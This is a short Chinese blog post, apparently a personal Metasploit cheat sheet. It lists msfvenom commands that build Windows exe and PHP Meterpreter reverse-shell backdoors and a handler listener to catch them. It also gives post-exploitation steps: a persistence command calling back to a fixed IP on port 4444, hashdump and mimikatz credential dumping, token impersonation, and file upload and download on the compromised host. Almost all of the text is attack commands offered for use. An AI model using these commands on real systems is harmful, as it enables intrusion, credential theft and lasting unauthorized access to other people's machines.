Metasploit笔记


生成exe后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe

生成PHP后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php

使用监听模块(默认)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

搜寻存在漏洞模块

post/multi/recon/local_exploit_suggester

迁移进程

migrate pid

权限维持 -Persistence

run persistence -U -i 10 -p 4444 -r 192.168.61.3

抓取Hash

run hashdump

load mimikatz

令牌伪装

list_tokens-u

如果查看失败先用

use incognito 或者 load incognito

进入该模块 再使用

impersonate_token 用户名

基本操作命令

ls:列出当前路径下的所有文件和文件夹。

pwdgetwd:查看当前路径。

search:搜索文件,使用 search -h 查看帮助。

cat:查看文件内容,比如 cat test.txt

edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。

rm:删除文件。

cd:切换路径。

mkdir:创建文件夹。

rmdir:删除文件夹。

getlwdlpwd:查看自己系统的当前路径。

lcd:切换自己当前系统的目录。

lls:显示自己当前系统的所有文件和文件夹。

uploadupload 本地文件路径目标文件路径.

downloaddownload 目标文件路径 本地文件路径

------ 本文结束 ------

本文标题:Metasploit笔记

文章作者:ApiCoder

发布时间:2019年08月09日 - 16:08

最后更新:2019年08月09日 - 16:08

原始链接:http://www.safeinfo.me/2019/08/09/Metasploit笔记.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

ApiCoder wechat
扫一扫,加入信安圈。
0%